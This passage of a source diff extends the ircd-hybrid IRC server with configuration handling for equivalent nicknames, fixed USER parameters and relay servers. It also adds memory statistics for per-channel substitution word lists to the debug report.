+	MyFree(eitem->target);
+	MyFree(eitem);
+
+      } while (userparms);
+
+      for (i=0; i<relaynum; i++)
+	MyFree(relays[i]);
+
+      relaynum = 0;
+    }
+}
+
+/* these deal with the equivalent nicks stuff
+ *                                  -demond
+ */
+
+void report_equivs(struct Client* source_p)
+{
+  struct Equiv *eitem;
+
+  for (eitem = equivs; eitem; eitem = eitem->next)
+    sendto_one(source_p, form_str(RPL_EQUIVALENTS),
+	       me.name, source_p->name, 
+	       eitem->nick, eitem->target);
+}
+
+void add_equiv_nicks(char *nicks)
+{
+  char *p, *q, *buf;
+  struct Equiv *eitem;
+
+  DupString(buf, nicks);
+  p = strchr(buf, '/');
+
+  if (p) {
+    *p = 0; ++p;
+    
+    if (*p) {
+
+      eitem = (struct Equiv*) MyMalloc(sizeof(struct Equiv));
+
+      DupString(q, buf); eitem->nick = q;
+      DupString(q, p); eitem->target = q;
+
+      eitem->next = equivs;
+      equivs = eitem;
+    }
+  }
+
+  MyFree(buf);
+}
+
+/* USER constant parameter handling
+ *                        -demond
+ */
+
+void add_userpar_param(char *param)
+{
+  char *p, *q, *buf;
+  struct Equiv *eitem;
+
+  if (!param[0]) return;
+
+  DupString(buf, param);
+  p = strchr(buf, '/');
+
+  eitem = (struct Equiv*) MyMalloc(sizeof(struct Equiv));
+
+  if (p) {
+
+    *p = 0; ++p;
+	DupString(q, buf); eitem->nick = q;
+    
+    if (*p) {
+
+      DupString(q, p); eitem->target = q;
+    }
+
+  } else {
+	
+	DupString(q, buf); eitem->nick = q;
+  }
+
+  eitem->next = userparms;
+  userparms = eitem;
+
+  MyFree(buf);
+}
+
+void report_userparms(struct Client* source_p)
+{
+  struct Equiv *eitem;
+
+  for (eitem = userparms; eitem; eitem = eitem->next)
+    sendto_one(source_p, form_str(RPL_USERPARMS),
+	       me.name, source_p->name, eitem->nick, 
+		   eitem->target? eitem->target : "<NULL>");
+}
+
+int IsUserPar(char *host, char *server)
+{
+	struct Equiv *eitem;
+
+	for (eitem = userparms; eitem; eitem = eitem->next)
+		if (strcmp(host, eitem->nick) == 0)
+			if (eitem->target) {
+				if (strcmp(server, eitem->target) == 0)
+					return 1;
+			} else
+				return 1;
+
+	return 0;
+}
+
+/* bot relay servers, ignored for various reasons
+ *                                       -demond
+ */
+
+void add_relay_server(char *name)
+{
+
+  if (relaynum < MAXRELAYS)
+    DupString(relays[relaynum++], name);
+}
+
+void report_relays(struct Client* source_p)
+{
+  int i;
+
+  for (i=0; i<relaynum; i++)
+    sendto_one(source_p, form_str(RPL_RELAYS),
+	       me.name, source_p->name, relays[i]); 
 }
 
+int IsRelay(struct Client* client_p)
+{
+  int i;
+
+  for (i=0; i<relaynum; i++)
+    if (irccmp(relays[i], client_p->name) == 0)
+      return 1;
+
+  return 0;
+}
+
+char *get_equiv_nick(char *nick, char *target)
+{
+  struct Equiv *eitem;
+
+  for (eitem = equivs; eitem; eitem = eitem->next)
+    if (irccmp(nick, eitem->nick) == 0) {
+
+      strncpy_irc(target, eitem->target, NICKLEN);
+      return target;
+    }
+
+  return NULL;
+}
+
+
 /*
  * flush_deleted_I_P
  *
@@ -2318,6 +2596,12 @@
 {
   aconf->next = u_conf;
   u_conf = aconf;
+}
+
+void conf_add_z_conf(struct ConfItem *aconf)
+{
+  aconf->next = z_conf;
+  z_conf = aconf;
 }
 
 /*
diff -uNrd ircd-hybrid-7beta5/src/s_debug.c hybrid7-bg/src/s_debug.c
--- ircd-hybrid-7beta5/src/s_debug.c	Sat Apr 21 17:59:10 2001
+++ hybrid7-bg/src/s_debug.c	Tue Jul  9 15:19:31 2002
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: s_debug.c,v 7.54 2001/04/21 21:59:10 toot Exp $
+ *   $Id: s_debug.c,v 1.2 2002/07/09 19:19:31 Administrator Exp $
  */
 
 #include <sys/types.h> 
@@ -188,6 +188,7 @@
   int channel_bans = 0;      
   int channel_except = 0;
   int channel_invex = 0;
+  int channel_subst = 0;
 
   int wwu = 0;                  /* whowas users */
   int class_count = 0;          /* classes */
@@ -202,6 +203,7 @@
   u_long channel_ban_memory = 0;
   u_long channel_except_memory = 0;
   u_long channel_invex_memory = 0;
+  u_long channel_subst_memory = 0;
 
   u_long away_memory = 0;       /* memory used by aways */
   u_long wwm = 0;               /* whowas array memory used */
@@ -259,7 +261,7 @@
         }
     }
 
-  /* Count up all channels, ban lists, except lists, Invex lists */
+  /* Count up all channels, ban lists, except lists, Invex, subst words lists */
 
   for (chptr = GlobalChannelList; chptr; chptr = chptr->nextch)
     {
@@ -316,7 +318,21 @@
           if (actualBan->who)
             channel_invex_memory += strlen(actualBan->who);
         }
-    }
+    
+	  for (dlink = chptr->substlist.head; dlink; dlink = dlink->next)
+        {
+	  actualBan = dlink->data;
+          channel_subst++;
+
+          channel_subst_memory += (sizeof(dlink_node) + 
+				   sizeof(struct Ban));
+          if (actualBan->banstr)
+            channel_subst_memory += strlen(actualBan->banstr);
+          if (actualBan->who)
+            channel_subst_memory += strlen(actualBan->who);
+        }
+
+	}
 
   /* count up all config items */
 
@@ -374,6 +390,10 @@
   sendto_one(source_p, ":%s %d %s :Invex %u(%d)",
              me.name, RPL_STATSDEBUG, source_p->name,
 	     channel_invex, (int)channel_invex_memory);
+
+  sendto_one(source_p, ":%s %d %s :Subst %u(%d)",
+             me.name, RPL_STATSDEBUG, source_p->name,
+	     channel_subst, (int)channel_subst_memory);
 
   sendto_one(source_p, ":%s %d %s :Channel members %u(%u) invite %u(%u)",
              me.name, RPL_STATSDEBUG, source_p->name, channel_users,
